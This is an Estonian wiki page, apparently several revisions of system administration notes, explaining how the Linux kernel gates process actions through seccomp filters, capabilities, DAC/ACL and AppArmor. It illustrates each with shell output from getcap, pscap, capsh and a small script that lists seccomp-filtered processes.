/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

seccomp leiab kõneks olevad syscallid üles nn bpf-classic filtrite abil, antud juhul 23 tükki (neid ei esita bpftool prog show)

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep Seccomp
Seccomp: 2
Seccomp_filters: 23
</pre>

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-04T15:24:20Z

Imre: /* Tööpõhimõte */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* protsess on arvutis esinev kõige olulisem nähtus - kõik muu on nö teda teenindav personal (riistvara (mälu, protsessor, storage, võrk), kernel, kasutajad-grupid, namespace-capabilities-seccomp-syscalls-jms raamistik)
* arvuti (prosessi) ülesandaks on üldiselt teisendada sisend väljundiks (kasutades seejuures riistara, tarkvara st teisi abistavaid protsesse jms)
* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* capability'le vastab komplekt syscallisid (tavaliselt)
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root, siis see on samaväärne kõigi capacitite olemasoluga

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega
* tundub, et reaalsuses see olukord ei ole väga sirgejooneline - nt apparmor sätib samuti capabilitisid (rakendub nö kõige suurem kitsendus)

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities
* https://sites.google.com/site/fullycapable/Home
* /etc/security/capability.conf

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

seccomp leiab kõneks olevad syscallid üles nn bpf-classic filtrite abil, antud juhul 23 tükki (neid ei esita bpftool prog show)

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep Seccomp
Seccomp: 2
Seccomp_filters: 23
</pre>

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-04T14:33:21Z

Imre: /* Tööpõhimõte */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* protsess on arvutis esinev kõige olulisem nähtus - kõik muu on nö teda teenindav personal (riistvara (mälu, protsessor, storage, võrk), kernel, kasutajad-grupid, namespace-capabilities-seccomp-syscalls-jms raamistik)
* arvuti (prosessi) ülesandaks on üldiselt teisendada sisend väljundiks (kasutades seejuures riistara, tarkvara st teisi abistavaid protsesse jme)
* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* capability'le vastab komplekt syscallisid (tavaliselt)
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root, siis see on samaväärne kõigi capacitite olemasoluga

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega
* tundub, et reaalsuses see olukord ei ole väga sirgejooneline - nt apparmor sätib samuti capabilitisid (rakendub nö kõige suurem kitsendus)

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities
* https://sites.google.com/site/fullycapable/Home
* /etc/security/capability.conf

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

seccomp leiab kõneks olevad syscallid üles nn bpf-classic filtrite abil, antud juhul 23 tükki (neid ei esita bpftool prog show)

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep Seccomp
Seccomp: 2
Seccomp_filters: 23
</pre>

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-04T13:32:30Z

Imre:

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* protsess on arvutis esinev kõige olulisem nähtus - kõik muu on nö teda teenindav personal (riistvara, kernel, kasutajad-grupid, namespace-capabilities-seccomp-syscalls-jms raamistik)
* arvuti (prosessi) ülesandaks on üldiselt teisendada sisend väljundiks (kasutades seejuures riistara, tarkvara st teisi abistavaid protsesse jme)
* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* capability'le vastab komplekt syscallisid (tavaliselt)
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root, siis see on samaväärne kõigi capacitite olemasoluga

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega
* tundub, et reaalsuses see olukord ei ole väga sirgejooneline - nt apparmor sätib samuti capabilitisid (rakendub nö kõige suurem kitsendus)

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities
* https://sites.google.com/site/fullycapable/Home
* /etc/security/capability.conf

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

